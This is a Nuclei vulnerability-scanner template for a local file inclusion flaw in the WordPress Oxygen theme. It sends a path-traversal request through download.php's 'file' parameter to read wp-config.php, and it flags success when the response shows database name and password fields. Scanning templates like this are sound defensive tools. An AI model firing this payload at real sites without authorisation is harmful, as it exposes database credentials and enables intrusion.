nuclei-templates/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml

35 lines
842 B
YAML

id: wp-oxygen-theme-lfi
info:
name: WordPress Oxygen-Theme - Local File Inclusion
author: 0x_Akoko
severity: high
description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.
reference:
- https://cxsecurity.com/issue/WLB-2019030178
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: wordpress,wp-theme,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/07/29